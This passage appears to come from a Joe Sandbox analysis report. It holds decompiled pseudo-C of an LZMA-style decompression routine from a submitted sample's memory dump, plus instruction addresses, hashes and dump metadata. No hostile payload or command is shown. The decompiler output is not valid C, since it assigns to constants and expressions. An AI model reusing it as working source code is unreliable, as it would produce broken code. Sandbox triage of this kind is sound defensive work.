                            											if( *(__ebp - 0x40) != 0) {
                            												goto L90;
                            											}
                            											__eflags =  *(__ebp - 0x60);
                            											if( *(__ebp - 0x60) == 0) {
                            												goto L171;
                            											}
                            											__eax = 0;
                            											__eflags =  *(__ebp - 0x38) - 7;
                            											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                            											__eflags = _t259;
                            											0 | _t259 = _t259 + _t259 + 9;
                            											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                            											goto L76;
                            										case 0xa:
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												__eax =  *(__ebp - 4);
                            												__ecx =  *(__ebp - 0x38);
                            												 *(__ebp - 0x84) = 0xb;
                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                            												goto L132;
                            											}
                            											__eax =  *(__ebp - 0x28);
                            											goto L89;
                            										case 0xb:
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												__ecx =  *(__ebp - 0x24);
                            												__eax =  *(__ebp - 0x20);
                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                            											} else {
                            												__eax =  *(__ebp - 0x24);
                            											}
                            											__ecx =  *(__ebp - 0x28);
                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                            											L89:
                            											__ecx =  *(__ebp - 0x2c);
                            											 *(__ebp - 0x2c) = __eax;
                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            											L90:
                            											__eax =  *(__ebp - 4);
                            											 *(__ebp - 0x80) = 0x15;
                            											__eax =  *(__ebp - 4) + 0xa68;
                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                            											goto L69;
                            										case 0xc:
                            											L100:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												 *(__ebp - 0x88) = 0xc;
                            												goto L170;
                            											}
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t335 = __ebp - 0x70;
                            											 *_t335 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t335;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											__eax =  *(__ebp - 0x2c);
                            											goto L102;
                            										case 0xd:
                            											L37:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												 *(__ebp - 0x88) = 0xd;
                            												goto L170;
                            											}
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t122 = __ebp - 0x70;
                            											 *_t122 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t122;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											L39:
                            											__eax =  *(__ebp - 0x40);
                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                            												goto L48;
                            											}
                            											__eflags = __ebx - 0x100;
                            											if(__ebx >= 0x100) {
                            												goto L54;
                            											}
                            											L41:
                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                            											__ecx =  *(__ebp - 0x58);
                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                            											 *(__ebp - 0x48) = __eax;
                            											__eax = __eax + 1;
                            											__eax = __eax << 8;
                            											__eax = __eax + __ebx;
                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            											__ax =  *__esi;
                            											 *(__ebp - 0x54) = __esi;
                            											__edx = __ax & 0x0000ffff;
                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                            											__eflags =  *(__ebp - 0xc) - __ecx;
                            											if( *(__ebp - 0xc) >= __ecx) {
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            												__cx = __ax;
                            												 *(__ebp - 0x40) = 1;
                            												__cx = __ax >> 5;
                            												__eflags = __eax;
                            												__ebx = __ebx + __ebx + 1;
                            												 *__esi = __ax;
                            											} else {
                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                            												 *(__ebp - 0x10) = __ecx;
                            												0x800 = 0x800 - __edx;
                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                            												__ebx = __ebx + __ebx;
                            												 *__esi = __cx;
                            											}
                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                            											 *(__ebp - 0x44) = __ebx;
                            											if( *(__ebp - 0x10) >= 0x1000000) {
                            												goto L39;
                            											} else {
                            												goto L37;
                            											}
                            										case 0xe:
                            											L46:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												 *(__ebp - 0x88) = 0xe;
                            												goto L170;
                            											}
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t156 = __ebp - 0x70;
                            											 *_t156 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t156;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											while(1) {
                            												L48:
                            												__eflags = __ebx - 0x100;
                            												if(__ebx >= 0x100) {
                            													break;
                            												}
                            												__eax =  *(__ebp - 0x58);
                            												__edx = __ebx + __ebx;
                            												__ecx =  *(__ebp - 0x10);
                            												__esi = __edx + __eax;
                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                            												__ax =  *__esi;
                            												 *(__ebp - 0x54) = __esi;
                            												__edi = __ax & 0x0000ffff;
                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            												__eflags =  *(__ebp - 0xc) - __ecx;
                            												if( *(__ebp - 0xc) >= __ecx) {
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            													__cx = __ax;
                            													_t170 = __edx + 1; // 0x1
                            													__ebx = _t170;
                            													__cx = __ax >> 5;
                            													__eflags = __eax;
                            													 *__esi = __ax;
                            												} else {
                            													 *(__ebp - 0x10) = __ecx;
                            													0x800 = 0x800 - __edi;
                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            													__ebx = __ebx + __ebx;
                            													 *__esi = __cx;
                            												}
                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                            												 *(__ebp - 0x44) = __ebx;
                            												if( *(__ebp - 0x10) >= 0x1000000) {
                            													continue;
                            												} else {
                            													goto L46;
                            												}
                            											}
                            											L54:
                            											_t173 = __ebp - 0x34;
                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                            											__eflags =  *_t173;
                            											goto L55;
                            										case 0xf:
                            											L58:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												 *(__ebp - 0x88) = 0xf;
                            												goto L170;
                            											}
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t203 = __ebp - 0x70;
                            											 *_t203 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t203;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											L60:
                            											__eflags = __ebx - 0x100;
                            											if(__ebx >= 0x100) {
                            												L55:
                            												__al =  *(__ebp - 0x44);
                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                            												goto L56;
                            											}
                            											L61:
                            											__eax =  *(__ebp - 0x58);
                            											__edx = __ebx + __ebx;
                            											__ecx =  *(__ebp - 0x10);
                            											__esi = __edx + __eax;
                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                            											__ax =  *__esi;
                            											 *(__ebp - 0x54) = __esi;
                            											__edi = __ax & 0x0000ffff;
                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            											__eflags =  *(__ebp - 0xc) - __ecx;
                            											if( *(__ebp - 0xc) >= __ecx) {
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            												__cx = __ax;
                            												_t217 = __edx + 1; // 0x1
                            												__ebx = _t217;
                            												__cx = __ax >> 5;
                            												__eflags = __eax;
                            												 *__esi = __ax;
                            											} else {
                            												 *(__ebp - 0x10) = __ecx;
                            												0x800 = 0x800 - __edi;
                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            												__ebx = __ebx + __ebx;
                            												 *__esi = __cx;
                            											}
                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                            											 *(__ebp - 0x44) = __ebx;
                            											if( *(__ebp - 0x10) >= 0x1000000) {
                            												goto L60;
                            											} else {
                            												goto L58;
                            											}
                            										case 0x10:
                            											L110:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												 *(__ebp - 0x88) = 0x10;
                            												goto L170;
                            											}
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t366 = __ebp - 0x70;
                            											 *_t366 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t366;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											goto L112;
                            										case 0x11:
                            											L69:
                            											__esi =  *(__ebp - 0x58);
                            											 *(__ebp - 0x84) = 0x12;
                            											L132:
                            											 *(_t612 - 0x54) = _t605;
                            											goto L133;
                            										case 0x12:
                            											goto L0;
                            										case 0x13:
                            											__eflags =  *(__ebp - 0x40);
                            											if( *(__ebp - 0x40) != 0) {
                            												_t469 = __ebp - 0x58;
                            												 *_t469 =  *(__ebp - 0x58) + 0x204;
                            												__eflags =  *_t469;
                            												 *(__ebp - 0x30) = 0x10;
                            												 *(__ebp - 0x40) = 8;
                            												goto L144;
                            											}
                            											__eax =  *(__ebp - 0x4c);
                            											__ecx =  *(__ebp - 0x58);
                            											__eax =  *(__ebp - 0x4c) << 4;
                            											 *(__ebp - 0x30) = 8;
                            											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                            											goto L130;
                            										case 0x14:
                            											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                            											__eax =  *(__ebp - 0x80);
                            											L140:
                            											 *(_t612 - 0x88) = _t533;
                            											goto L1;
                            										case 0x15:
                            											__eax = 0;
                            											__eflags =  *(__ebp - 0x38) - 7;
                            											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                            											__al = __al & 0x000000fd;
                            											__eax = (__eflags >= 0) - 1 + 0xb;
                            											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                            											goto L121;
                            										case 0x16:
                            											__eax =  *(__ebp - 0x30);
                            											__eflags = __eax - 4;
                            											if(__eax >= 4) {
                            												_push(3);
                            												_pop(__eax);
                            											}
                            											__ecx =  *(__ebp - 4);
                            											 *(__ebp - 0x40) = 6;
                            											__eax = __eax << 7;
                            											 *(__ebp - 0x7c) = 0x19;
                            											 *(__ebp - 0x58) = __eax;
                            											goto L145;
                            										case 0x17:
                            											goto L145;
                            										case 0x18:
                            											L146:
                            											__eflags =  *(__ebp - 0x6c);
                            											if( *(__ebp - 0x6c) == 0) {
                            												 *(__ebp - 0x88) = 0x18;
                            												goto L170;
                            											}
                            											__ecx =  *(__ebp - 0x70);
                            											__eax =  *(__ebp - 0xc);
                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											_t484 = __ebp - 0x70;
                            											 *_t484 =  *(__ebp - 0x70) + 1;
                            											__eflags =  *_t484;
                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                            											L148:
                            											_t487 = __ebp - 0x48;
                            											 *_t487 =  *(__ebp - 0x48) - 1;
                            											__eflags =  *_t487;
                            											goto L149;
                            										case 0x19:
                            											__eflags = __ebx - 4;
                            											if(__ebx < 4) {
                            												 *(__ebp - 0x2c) = __ebx;
                            												L120:
                            												_t394 = __ebp - 0x2c;
                            												 *_t394 =  *(__ebp - 0x2c) + 1;
                            												__eflags =  *_t394;
                            												L121:
                            												__eax =  *(__ebp - 0x2c);
                            												__eflags = __eax;
                            												if(__eax == 0) {
                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                            													goto L170;
                            												}
                            												__eflags = __eax -  *(__ebp - 0x60);
                            												if(__eax >  *(__ebp - 0x60)) {
                            													goto L171;
                            												}
                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                            												__eax =  *(__ebp - 0x30);
                            												_t401 = __ebp - 0x60;
                            												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                            												__eflags =  *_t401;
                            												goto L124;
                            											}
                            											__ecx = __ebx;
                            											__eax = __ebx;
                            											__ecx = __ebx >> 1;
                            											__eax = __ebx & 0x00000001;
                            											__ecx = (__ebx >> 1) - 1;
                            											__al = __al | 0x00000002;
                            											__eax = (__ebx & 0x00000001) << __cl;
                            											__eflags = __ebx - 0xe;
                            											 *(__ebp - 0x2c) = __eax;
                            											if(__ebx >= 0xe) {
                            												__ebx = 0;
                            												 *(__ebp - 0x48) = __ecx;
                            												L103:
                            												__eflags =  *(__ebp - 0x48);
                            												if( *(__ebp - 0x48) <= 0) {
                            													__eax = __eax + __ebx;
                            													 *(__ebp - 0x40) = 4;
                            													 *(__ebp - 0x2c) = __eax;
                            													__eax =  *(__ebp - 4);
                            													__eax =  *(__ebp - 4) + 0x644;
                            													__eflags = __eax;
                            													L109:
                            													__ebx = 0;
                            													 *(__ebp - 0x58) = __eax;
                            													 *(__ebp - 0x50) = 1;
                            													 *(__ebp - 0x44) = 0;
                            													 *(__ebp - 0x48) = 0;
                            													L113:
                            													__eax =  *(__ebp - 0x40);
                            													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                            													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                            														_t392 = __ebp - 0x2c;
                            														 *_t392 =  *(__ebp - 0x2c) + __ebx;
                            														__eflags =  *_t392;
                            														goto L120;
                            													}
                            													__eax =  *(__ebp - 0x50);
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                            													__eax =  *(__ebp - 0x58);
                            													__esi = __edi + __eax;
                            													 *(__ebp - 0x54) = __esi;
                            													__ax =  *__esi;
                            													__ecx = __ax & 0x0000ffff;
                            													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                            													__eflags =  *(__ebp - 0xc) - __edx;
                            													if( *(__ebp - 0xc) >= __edx) {
                            														__ecx = 0;
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                            														__ecx = 1;
                            														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                            														__ebx = 1;
                            														__ecx =  *(__ebp - 0x48);
                            														__ebx = 1 << __cl;
                            														__ecx = 1 << __cl;
                            														__ebx =  *(__ebp - 0x44);
                            														__ebx =  *(__ebp - 0x44) | __ecx;
                            														__cx = __ax;
                            														__cx = __ax >> 5;
                            														__eax = __eax - __ecx;
                            														__edi = __edi + 1;
                            														__eflags = __edi;
                            														 *(__ebp - 0x44) = __ebx;
                            														 *__esi = __ax;
                            														 *(__ebp - 0x50) = __edi;
                            													} else {
                            														 *(__ebp - 0x10) = __edx;
                            														0x800 = 0x800 - __ecx;
                            														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                            														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                            														 *__esi = __dx;
                            													}
                            													__eflags =  *(__ebp - 0x10) - 0x1000000;
                            													if( *(__ebp - 0x10) >= 0x1000000) {
                            														L112:
                            														_t369 = __ebp - 0x48;
                            														 *_t369 =  *(__ebp - 0x48) + 1;
                            														__eflags =  *_t369;
                            														goto L113;
                            													} else {
                            														goto L110;
                            													}
                            												}
                            												__ecx =  *(__ebp - 0xc);
                            												__ebx = __ebx + __ebx;
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                            												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                            												 *(__ebp - 0x44) = __ebx;
                            												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                            													__ecx =  *(__ebp - 0x10);
                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                            													__ebx = __ebx | 0x00000001;
                            													__eflags = __ebx;
                            													 *(__ebp - 0x44) = __ebx;
                            												}
                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                            												if( *(__ebp - 0x10) >= 0x1000000) {
                            													L102:
                            													_t339 = __ebp - 0x48;
                            													 *_t339 =  *(__ebp - 0x48) - 1;
                            													__eflags =  *_t339;
                            													goto L103;
                            												} else {
                            													goto L100;
                            												}
                            											}
                            											__edx =  *(__ebp - 4);
                            											__eax = __eax - __ebx;
                            											 *(__ebp - 0x40) = __ecx;
                            											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                            											goto L109;
                            										case 0x1a:
                            											L56:
                            											__eflags =  *(__ebp - 0x64);
                            											if( *(__ebp - 0x64) == 0) {
                            												 *(__ebp - 0x88) = 0x1a;
                            												goto L170;
                            											}
                            											__ecx =  *(__ebp - 0x68);
                            											__al =  *(__ebp - 0x5c);
                            											__edx =  *(__ebp - 8);
                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                            											 *( *(__ebp - 0x68)) = __al;
                            											__ecx =  *(__ebp - 0x14);
                            											 *(__ecx +  *(__ebp - 8)) = __al;
                            											__eax = __ecx + 1;
                            											__edx = 0;
                            											_t192 = __eax %  *(__ebp - 0x74);
                            											__eax = __eax /  *(__ebp - 0x74);
                            											__edx = _t192;
                            											goto L80;
                            										case 0x1b:
                            											L76:
                            											__eflags =  *(__ebp - 0x64);
                            											if( *(__ebp - 0x64) == 0) {
                            												 *(__ebp - 0x88) = 0x1b;
                            												goto L170;
                            											}
                            											__eax =  *(__ebp - 0x14);
                            											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            											__eflags = __eax -  *(__ebp - 0x74);
                            											if(__eax >=  *(__ebp - 0x74)) {
                            												__eax = __eax +  *(__ebp - 0x74);
                            												__eflags = __eax;
                            											}
                            											__edx =  *(__ebp - 8);
                            											__cl =  *(__eax + __edx);
                            											__eax =  *(__ebp - 0x14);
                            											 *(__ebp - 0x5c) = __cl;
                            											 *(__eax + __edx) = __cl;
                            											__eax = __eax + 1;
                            											__edx = 0;
                            											_t275 = __eax %  *(__ebp - 0x74);
                            											__eax = __eax /  *(__ebp - 0x74);
                            											__edx = _t275;
                            											__eax =  *(__ebp - 0x68);
                            											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                            											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            											_t284 = __ebp - 0x64;
                            											 *_t284 =  *(__ebp - 0x64) - 1;
                            											__eflags =  *_t284;
                            											 *( *(__ebp - 0x68)) = __cl;
                            											L80:
                            											 *(__ebp - 0x14) = __edx;
                            											goto L81;
                            										case 0x1c:
                            											while(1) {
                            												L124:
                            												__eflags =  *(__ebp - 0x64);
                            												if( *(__ebp - 0x64) == 0) {
                            													break;
                            												}
                            												__eax =  *(__ebp - 0x14);
                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                            												__eflags = __eax -  *(__ebp - 0x74);
                            												if(__eax >=  *(__ebp - 0x74)) {
                            													__eax = __eax +  *(__ebp - 0x74);
                            													__eflags = __eax;
                            												}
                            												__edx =  *(__ebp - 8);
                            												__cl =  *(__eax + __edx);
                            												__eax =  *(__ebp - 0x14);
                            												 *(__ebp - 0x5c) = __cl;
                            												 *(__eax + __edx) = __cl;
                            												__eax = __eax + 1;
                            												__edx = 0;
                            												_t415 = __eax %  *(__ebp - 0x74);
                            												__eax = __eax /  *(__ebp - 0x74);
                            												__edx = _t415;
                            												__eax =  *(__ebp - 0x68);
                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                            												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            												__eflags =  *(__ebp - 0x30);
                            												 *( *(__ebp - 0x68)) = __cl;
                            												 *(__ebp - 0x14) = _t415;
                            												if( *(__ebp - 0x30) > 0) {
                            													continue;
                            												} else {
                            													L81:
                            													 *(__ebp - 0x88) = 2;
                            													goto L1;
                            												}
                            											}
                            											 *(__ebp - 0x88) = 0x1c;
                            											L170:
                            											_push(0x22);
                            											_pop(_t567);
                            											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
                            											_t535 = 0;
                            											L172:
                            											return _t535;
                            									}
                            								}
                            								L171:
                            								_t535 = _t534 | 0xffffffff;
                            								goto L172;
                            							}
                            						}
                            						__eax =  *(__ebp - 0x50);
                            						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                            						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                            						__eax =  *(__ebp - 0x58);
                            						__esi = __edx + __eax;
                            						 *(__ebp - 0x54) = __esi;
                            						__ax =  *__esi;
                            						__edi = __ax & 0x0000ffff;
                            						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                            						if( *(__ebp - 0xc) >= __ecx) {
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                            							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                            							__cx = __ax;
                            							__cx = __ax >> 5;
                            							__eax = __eax - __ecx;
                            							__edx = __edx + 1;
                            							 *__esi = __ax;
                            							 *(__ebp - 0x50) = __edx;
                            						} else {
                            							 *(__ebp - 0x10) = __ecx;
                            							0x800 = 0x800 - __edi;
                            							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                            							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                            							 *__esi = __cx;
                            						}
                            						if( *(__ebp - 0x10) >= 0x1000000) {
                            							goto L148;
                            						} else {
                            							goto L146;
                            						}
                            					}
                            					goto L1;
                            				}
                            			}








                            0x00407257
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x00000000
                            0x00407259
                            0x00000000
                            0x00407259
                            0x00407257
                            0x004071dd
                            0x004071e0
                            0x004071e2
                            0x004071e5
                            0x00000000
                            0x00000000
                            0x00406f44
                            0x00406f44
                            0x00406f48
                            0x0040758d
                            0x00000000
                            0x0040758d
                            0x00406f4e
                            0x00406f51
                            0x00406f54
                            0x00406f57
                            0x00406f5a
                            0x00406f5d
                            0x00406f60
                            0x00406f62
                            0x00406f65
                            0x00406f68
                            0x00406f6b
                            0x00406f6d
                            0x00406f6d
                            0x00406f6d
                            0x00000000
                            0x00000000
                            0x004070cf
                            0x004070cf
                            0x004070d3
                            0x00407599
                            0x00000000
                            0x00407599
                            0x004070d9
                            0x004070dc
                            0x004070df
                            0x004070e2
                            0x004070e4
                            0x004070e4
                            0x004070e4
                            0x004070e7
                            0x004070ea
                            0x004070ed
                            0x004070f0
                            0x004070f3
                            0x004070f6
                            0x004070f7
                            0x004070f9
                            0x004070f9
                            0x004070f9
                            0x004070fc
                            0x004070ff
                            0x00407102
                            0x00407105
                            0x00407105
                            0x00407105
                            0x00407108
                            0x0040710a
                            0x0040710a
                            0x00000000
                            0x00000000
                            0x0040734c
                            0x0040734c
                            0x0040734c
                            0x00407350
                            0x00000000
                            0x00000000
                            0x00407356
                            0x00407359
                            0x0040735c
                            0x0040735f
                            0x00407361
                            0x00407361
                            0x00407361
                            0x00407364
                            0x00407367
                            0x0040736a
                            0x0040736d
                            0x00407370
                            0x00407373
                            0x00407374
                            0x00407376
                            0x00407376
                            0x00407376
                            0x00407379
                            0x0040737c
                            0x0040737f
                            0x00407382
                            0x00407385
                            0x00407389
                            0x0040738b
                            0x0040738e
                            0x00000000
                            0x00407390
                            0x0040710d
                            0x0040710d
                            0x00000000
                            0x0040710d
                            0x0040738e
                            0x004075c3
                            0x004075e5
                            0x004075eb
                            0x004075ed
                            0x004075f4
                            0x004075f6
                            0x004075fd
                            0x00407601
                            0x00000000
                            0x00406bf2
                            0x004075fa
                            0x004075fa
                            0x00000000
                            0x004075fa
                            0x00407447
                            0x004074cd
                            0x004074d3
                            0x004074d6
                            0x004074d9
                            0x004074dc
                            0x004074df
                            0x004074e2
                            0x004074e5
                            0x004074e8
                            0x004074ee
                            0x00407507
                            0x0040750a
                            0x0040750d
                            0x00407510
                            0x00407514
                            0x00407516
                            0x00407517
                            0x0040751a
                            0x004074f0
                            0x004074f0
                            0x004074f8
                            0x004074fd
                            0x004074ff
                            0x00407502
                            0x00407502
                            0x00407524
                            0x00000000
                            0x00407526
                            0x00000000
                            0x00407526
                            0x00407524
                            0x00000000
                            0x00407399

                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                            • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                            • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                            • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 98%
                            			E004070AB() {
                            				unsigned short _t532;
                            				signed int _t533;
                            				void _t534;
                            				void* _t535;
                            				signed int _t536;
                            				signed int _t565;
                            				signed int _t568;
                            				signed int _t589;
                            				signed int* _t606;
                            				void* _t613;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					if( *(_t613 - 0x40) != 0) {
                            						L89:
                            						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                            						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                            						L69:
                            						_t606 =  *(_t613 - 0x58);
                            						 *(_t613 - 0x84) = 0x12;
                            						L132:
